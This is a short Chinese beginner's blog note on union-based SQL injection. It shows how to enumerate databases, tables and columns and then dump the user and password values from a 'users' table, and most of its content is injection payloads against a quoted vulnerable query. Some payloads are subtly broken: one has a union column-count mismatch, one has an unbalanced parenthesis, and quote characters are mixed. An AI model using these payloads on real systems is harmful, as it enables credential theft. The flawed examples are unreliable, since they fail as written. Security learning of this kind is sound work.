您的位置: 首页  >  文章  >  8.sql injection之获取当前列的所有字段值(数据内容)-------小白笔记

8.sql injection之获取当前列的所有字段值(数据内容)-------小白笔记

分类: 文章 2025-02-28 17:01:17

1.爆库过程是:
爆库名
爆库里的表
爆表里的列字段
爆列里的字段值

2.注意:
①.表里的字段是:字段
②.列里的内容是:字段值,也就是数据信息

3.注入:
①源码:select first_name,last_name from users where id ='$id'
②构造语句(也就是给$id赋值):1’ union select user,password from users#
③真正执行的语句是:select first_name,last_name from users where id =’ 1' union select user,password from users#
//注意①:构造语句也可以一行显示:1' union select group_concat(concat_ws(char(32,58,32),user,password)) from users#

//注意②:构造语句也可以一行显示1' union select group_concat(user,' ',password)) from users#

4.附图:
8.sql injection之获取当前列的所有字段值(数据内容)-------小白笔记

5.SQL注入的思路图:

8.sql injection之获取当前列的所有字段值(数据内容)-------小白笔记

相关推荐